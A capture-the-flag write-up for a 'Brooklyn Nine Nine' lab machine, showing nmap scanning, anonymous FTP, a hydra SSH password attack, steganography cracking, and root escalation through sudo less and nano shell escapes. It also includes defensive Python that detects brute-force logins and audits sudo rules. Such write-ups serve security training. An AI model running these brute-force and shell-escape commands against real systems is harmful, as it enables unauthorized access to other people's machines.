Brooklyn Nine Nine

Reconnaissance

Initial nmap scan to find open ports, using the flag that treats all hosts as alive (-Pn):

nmap -Pn 10.10.146.230

Detailed Nmap scan:

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 21,22,80

  • (-oN nmap): Saving the output into a file called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.146.230

Enumeration

Port 21: FTP

It looks like we can log in through FTP as anonymous, so let's do that. (Use anonymous for both the username and the password, or just hit Enter at the password prompt.)

ftp 10.10.146.230

Let's list the files in this directory.

There is a file that is a note to a person called Jake. Let's transfer this file to our machine and read what it has to say.

get note_to_jake.txt

Let's now read the file.

It looks like Jake did not change his password, as mentioned by a person called Amy. We also have the username Holt, so we now have three usernames.

Port 80: HTTP

Let's visit the website.

It's a Brooklyn Nine Nine poster. Let's look at the source code.

We have something interesting: they mention steganography, which is the practice of concealing a message within another message. So let's download the image onto our machine; the name of the image is in the source code.

wget http://10.10.146.230/brooklyn99.jpg

Exploitation

FTP

We can try to use hydra to find the password for Jake.

hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.146.230 ssh

We found the password, so let's log in through ssh.

ssh jake@10.10.146.230

And we are logged in. We can find the user flag here.
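Seen from the defender's side, a dictionary attack on a weak password leaves a run of failed password attempts followed by one success in the sshd log. The following detector is an added example, not part of the original writeup; the log lines, the threshold and window values, the assumed year and the function name are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (not from the page); 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = """\
May 26 09:14:01 host sshd[1201]: Failed password for jake from 192.0.2.10 port 40112 ssh2
May 26 09:14:02 host sshd[1203]: Failed password for jake from 192.0.2.10 port 40114 ssh2
May 26 09:14:02 host sshd[1205]: Failed password for jake from 192.0.2.10 port 40116 ssh2
May 26 09:14:03 host sshd[1207]: Failed password for jake from 192.0.2.10 port 40118 ssh2
May 26 09:14:04 host sshd[1209]: Failed password for jake from 192.0.2.10 port 40120 ssh2
May 26 09:14:05 host sshd[1211]: Accepted password for jake from 192.0.2.10 port 40122 ssh2
May 26 09:20:00 host sshd[1300]: Failed password for invalid user amy from 192.0.2.77 port 51000 ssh2
May 26 10:02:11 host sshd[1400]: Accepted password for holt from 192.0.2.50 port 52000 ssh2
"""

LINE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def find_guessed_logins(log_text, threshold=5, window=timedelta(minutes=5), year=2024):
    """Return (user, source, failures) for every accepted password login that
    was preceded by >= threshold failures for that user from that source
    inside the window. Syslog lines carry no year, so one is assumed."""
    failures = defaultdict(list)   # (user, source) -> failure timestamps
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        stamp, outcome, user, source = m.groups()
        when = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        key = (user, source)
        if outcome == "Failed":
            failures[key].append(when)
            continue
        recent = [t for t in failures[key] if when - t <= window]
        if len(recent) >= threshold:
            hits.append((user, source, len(recent)))
        failures[key].clear()      # a success starts a fresh count
    return hits

if __name__ == "__main__":
    for user, source, n in find_guessed_logins(SAMPLE_LOG):
        print(f"ALERT {user}: password login from {source} after {n} failures")
```

An alert from this check means the account's password was most likely guessed, so the response is a credential reset and session review rather than only blocking the source address.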

HTTP

apt-get install stegcracker

Now you can use stegcracker

stegcracker brooklyn99.jpg

We have a password, which can be the password for the file. Let's see what the file is hiding.

steghide --extract -sf brooklyn99.jpg

Now we have the password for Holt, so let's log in through ssh.

ssh holt@10.10.146.230

Privilege Escalation

Jake

Let's run sudo -l to see what Jake can run as root.

sudo -l

It looks like we can run the less command, which lets us see the contents of files, so let's run it to check what /root/root.txt contains.

sudo /usr/bin/less /root/root.txt

Let's use these commands to become root.

sudo less /etc/profile
!/bin/sh

Holt

Let's run sudo -l to see what Holt can run as root.

sudo -l

Let's run these commands.

sudo nano
^R^X
reset; sh 1>&0 2>&0

We are now root. You can find the root flag in /root/
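Both escalations above come from sudo rules that grant an interactive pager or editor, which can start a shell from inside the program. The following audit of `sudo -l` output is an added example, not part of the original writeup; the sample output, the short list of binaries and the function name are constructed for illustration, and the list is not complete.

```python
import os
import re

# Illustrative sample of binaries with documented shell escapes (not a complete list).
SHELL_ESCAPE = {"less", "more", "man", "nano", "vi", "vim", "ed", "awk", "find"}
TAG = re.compile(r"^((?:NO)?(?:PASSWD|EXEC|SETENV)):\s*")

# Constructed `sudo -l` output for three users (not taken from the page).
SAMPLE = """\
User jake may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/less
User holt may run the following commands on host:
    (ALL) NOPASSWD: /bin/nano
User amy may run the following commands on host:
    (root) NOEXEC: /usr/bin/less /var/log/syslog
    (root) /usr/sbin/ufw status
"""

def audit_sudo_rules(sudo_l_text):
    """Return (user, command, severity) for each rule whose binary can spawn
    a shell. Severity is 'high', or 'review' when the sudoers NOEXEC tag is
    set, since NOEXEC stops the program from executing further commands."""
    findings, user = [], None
    for line in sudo_l_text.splitlines():
        header = re.match(r"User (\S+) may run the following commands", line)
        if header:
            user = header.group(1)
            continue
        rule = re.match(r"\s+\([^)]*\)\s*(.*)", line)   # "(runas) TAGS: cmd, cmd"
        if not rule:
            continue
        rest, tags = rule.group(1), set()
        while (m := TAG.match(rest)):                    # peel off leading tags
            tags.add(m.group(1))
            rest = rest[m.end():]
        # Simple split; commas escaped inside command arguments are not handled.
        for command in (c.strip() for c in rest.split(",")):
            binary = os.path.basename(command.split()[0]) if command else ""
            if binary in SHELL_ESCAPE:
                severity = "review" if "NOEXEC" in tags else "high"
                findings.append((user, command, severity))
    return findings

if __name__ == "__main__":
    for user, command, severity in audit_sudo_rules(SAMPLE):
        print(f"{severity.upper():6} {user}: {command}")
```

A fixed file argument does not make a pager safe, which is why the third rule is still reported; for editing files as root, sudoedit is the usual replacement for granting an editor through sudo.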

We can use a tool called stegcracker to find hidden messages within files. If you do not have it, you can install it with the apt-get command shown under HTTP.

We can also try to become root using the commands found in GTFOBins.

We can run nano as root, so let's go to GTFOBins to find the commands to escalate privileges to root.